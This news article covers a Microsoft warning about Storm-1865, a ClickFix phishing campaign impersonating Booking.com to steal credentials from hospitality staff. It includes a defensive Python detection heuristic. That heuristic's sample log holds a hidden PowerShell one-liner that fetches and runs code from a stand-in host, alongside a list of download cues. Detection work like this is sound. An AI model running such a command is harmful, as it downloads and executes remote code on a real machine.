A phishing campaign that impersonates popular travel platform Booking.com is targeting hospitality organisations in the UK, Microsoft has warned.
Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry.
The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware families in order to conduct financial fraud and theft. As of February 2025, this campaign is ongoing.
This phishing attack specifically targets individuals in hospitality who are most likely to work with Booking.com, sending fake emails purporting to come from the agency.
In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features. In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.
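Because a ClickFix lure ends with the user pasting a command into the Run dialog, the resulting process is started by explorer.exe rather than by a browser, an Office application or a terminal. The following heuristic, an added example rather than anything from Microsoft's report, scores constructed process-creation events on that parent/child relationship plus remote-fetch cues in the command line; the interpreter list, keyword regex and sample events are assumptions, not indicators from this campaign.

```python
"""Flag ClickFix-style launches in constructed Windows process-creation events."""
import re
from dataclasses import dataclass

# Script hosts a pasted one-liner typically lands in (assumed list, tune per estate).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Cues that the one-liner fetches remote content or hides itself (assumed list).
REMOTE_FETCH = re.compile(
    r"(https?://|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin|"
    r"-enc\b|hidden)", re.I)


@dataclass
class ProcEvent:
    parent: str   # full path of the parent image
    image: str    # full path of the created process image
    cmdline: str  # command line of the created process


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def is_clickfix_candidate(ev: ProcEvent) -> bool:
    """True when explorer.exe (the Run dialog host) spawns a script interpreter
    whose command line reaches out to the network or hides its window."""
    if _basename(ev.parent) != "explorer.exe":
        return False
    if _basename(ev.image) not in INTERPRETERS:
        return False
    return bool(REMOTE_FETCH.search(ev.cmdline))


def parse_event(line: str) -> ProcEvent:
    """Parse one tab-separated key=value line (constructed log format)."""
    fields = dict(part.split("=", 1) for part in line.split("\t"))
    return ProcEvent(fields["parent"], fields["image"], fields["cmd"])


def scan(lines):
    """Return the events that match the ClickFix heuristic."""
    return [ev for ev in map(parse_event, lines) if is_clickfix_candidate(ev)]


# Constructed sample events; example.invalid is a reserved, non-routable name.
SAMPLE_LOG = [
    "parent=C:\\Windows\\explorer.exe\timage=C:\\Windows\\System32\\mshta.exe\tcmd=mshta https://example.invalid/verify",
    "parent=C:\\Windows\\explorer.exe\timage=C:\\Windows\\System32\\notepad.exe\tcmd=notepad",
    "parent=C:\\Windows\\System32\\cmd.exe\timage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tcmd=powershell -c Get-Date",
    "parent=C:\\Windows\\explorer.exe\timage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tcmd=powershell -w hidden -c \"iwr https://example.invalid/x | iex\"",
]

if __name__ == "__main__":
    for ev in scan(SAMPLE_LOG):
        print("ClickFix candidate:", ev.cmdline)
```

The explorer.exe parent is also produced by double-clicked files and Start-menu launches, so treat hits as triage leads; on the host, the Run dialog's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU corroborates whether the command was typed or pasted there.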
Microsoft tracks this campaign as Storm-1865, a cluster of activity related to phishing campaigns leading to payment data theft and fraudulent charges. Organizations can reduce the impact of phishing attacks by educating users on recognizing such scams. Microsoft's blog post includes additional recommendations to help users and defenders defend against these threats.
In this campaign, Storm-1865 identifies target organizations in the hospitality sector and targets individuals at those organizations likely to work with Booking.com. Storm-1865 then sends a malicious email impersonating Booking.com to the targeted individual. The content of the email varies greatly, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, account verification, and more.
Sarah Armstrong-Smith, chief security adviser at Microsoft UK, said: “Phishing attacks are becoming more sophisticated, using advanced social engineering techniques like ClickFix to manipulate human behaviour and bypass traditional security measures.
“The recent campaign impersonating Booking.com is a clear example of how cybercriminals exploit trust and urgency to deceive individuals to gain access to sensitive information.
“Cybercriminals are constantly adapting their tactics, but by staying alert, questioning unexpected messages and behaviour, and enabling extra security measures, consumers can protect themselves against these evolving threats.”
Booking.com said: “Unfortunately, phishing attacks by criminal organisations pose a significant threat to many industries. While we can confirm that Booking.com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware.
“The actual numbers of accommodations affected by this scam are a small fraction of those on our platform and we continue to make significant investments to limit the impact on our customers and partners.
“We are also committed to proactively helping our accommodation partners and customers to stay protected.
“Should a customer have any concern about a payment message, we ask them to carefully check the payment policy details on their booking confirmation to be sure that the message is legitimate.
“Customers are also encouraged to report any suspicious messages to our 24/7 customer service team or by clicking on ‘report an issue’ which is included in the chat function.
“It is important to note that we would never ask a customer to share payment information via email, chat messages, text messages or phone.”